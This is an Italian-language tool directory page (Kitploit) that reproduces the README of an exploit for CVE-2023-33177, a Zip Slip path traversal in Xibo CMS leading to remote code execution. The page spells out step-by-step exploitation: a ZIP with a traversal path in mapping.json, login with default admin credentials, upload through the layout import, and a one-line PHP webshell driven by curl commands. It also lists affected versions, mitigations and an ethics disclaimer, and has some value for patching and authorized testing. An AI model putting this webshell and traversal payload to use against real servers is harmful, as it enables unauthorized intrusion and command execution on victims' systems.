Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177 — Questo exploit dimostra una **vulnerabilità di path traversal** in Xibo CMS (CVE-2023-33177) che consente l'esecuzione remota di codice tramite importazioni di layout malintenzionati. | Kitploit
Strumenti/GitHubGitHub/complexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubcomplexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177

Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177

Questo exploit dimostra una **vulnerabilità di path traversal** in Xibo CMS (CVE-2023-33177) che consente l'esecuzione remota di codice tramite importazioni di layout malintenzionati.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
9 mesi faNon ancora revisionato
Condividi

Exploit RCE Zip Slip per Xibo CMS CVE-2023-33177

Questo exploit dimostra una vulnerabilità di path traversal in Xibo CMS (CVE-2023-33177) che consente l'esecuzione remota di codice tramite importazioni di layout malevoli.

Dettagli della vulnerabilità

CVE/Advisory: CVE-2023-33177 Versioni affette:

  • Xibo CMS 1.8.0 - 2.3.16
  • Xibo CMS 3.0.0 - 3.3.4

Tipo di vulnerabilità: Path Traversal (Zip Slip) Impatto: Remote Code Execution (RCE)

Riepilogo tecnico

Xibo CMS consente agli utenti autenticati di importare file di layout tramite archivi ZIP. La funzionalità di importazione non convalida correttamente i percorsi dei file nel file mapping.json, permettendo a un attaccante di scrivere file al di fuori della directory della libreria utilizzando sequenze di path traversal (../../).

Come funziona l'exploit

  1. Crea una struttura valida di export di layout Xibo con i file JSON richiesti
  2. Inietta path traversal in : utilizza come percorso del file
mapping.json
../../web/shell.php
  • Posiziona la webshell nel percorso traversato all'interno della struttura ZIP in library/../../web/shell.php
  • Xibo estrae senza convalida: risolve in /var/www/cms/web/shell.php
  • Ottiene RCE: la webshell è accessibile nella root web
  • La catena della vulnerabilità

    root@kitploit:~
    Zip contiene: library/../../web/shell.php
    Xibo legge:   library/ + ../../web/shell.php (da mapping.json)
    Xibo scrive:  /var/www/cms/library/temp/ + ../../web/shell.php
    Risultato:    /var/www/cms/web/shell.php ← Webshell nella root web!
    

    Utilizzo

    Generare l'exploit

    root@kitploit:~
    python3 create_exploit.py
    

    Questo crea exploit.zip contenente il pacchetto di layout malevolo.

    Passaggi di sfruttamento

    1. Accedi a Xibo CMS e fai login con le credenziali (predefinite: xibo_admin / password)
    2. Vai a Importa: Design → Layout → Importa
    3. Carica exploit.zip
    4. Ignora eventuali errori JSON: la webshell è già stata scritta su disco
    5. Esegui comandi tramite webshell:
      root@kitploit:~
      curl 'http://localhost:8080/shell.php?cmd=id'
      

    Struttura dei file

    Lo ZIP dell'exploit contiene:

    root@kitploit:~
    exploit.zip
    ├── layout.json          # Definizione valida del layout Xibo
    ├── playlist.json        # Playlist vuota (innesca l'importazione JSON)
    ├── mapping.json         # Contiene il payload di path traversal
    └── library/
        └── ../../web/
            └── shell.php    # Webshell PHP (viene estratta nella root web)
    

    Funzionalità della webshell

    La webshell incorporata è minimalista:

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    

    Accessibile tramite: http://<target>/shell.php?cmd=<comando>

    Mitigazione

    Versioni corrette:

    • Aggiorna a Xibo CMS 2.3.17+ (per il ramo 2.x)
    • Aggiorna a Xibo CMS 3.3.5+ (per il ramo 3.x)

    Strategie di mitigazione:

    1. Convalida tutti i percorsi dei file negli archivi ZIP prima dell'estrazione
    2. Rifiuta percorsi contenenti .. o percorsi assoluti
    3. Utilizza metodi di estrazione sicuri che prevengano il directory traversal
    4. Implementa una corretta convalida dell'input sulla funzionalità di importazione
    5. Limita i permessi di upload dei file a soli utenti autenticati e autorizzati

    Avviso legale ed etico

    Questo exploit è fornito per:

    • Scopi educativi
    • Competizioni CTF
    • Test di sicurezza autorizzati
    • Ricerca difensiva sulla sicurezza

    Non utilizzare questo exploit contro sistemi di cui non possiedi o non hai esplicita autorizzazione a testare.

    Riferimenti

    • Advisory: GHSA-jj27-x85q-crqv
    • Xibo CMS: https://xibo.org.uk/
    • Vulnerabilità Zip Slip: https://security.snyk.io/research/zip-slip-vulnerability
    • CVE-2023-33177: https://nvd.nist.gov/vuln/detail/CVE-2023-33177

    Autore

    complexusprada Novembre 2025

    Scarica lo strumento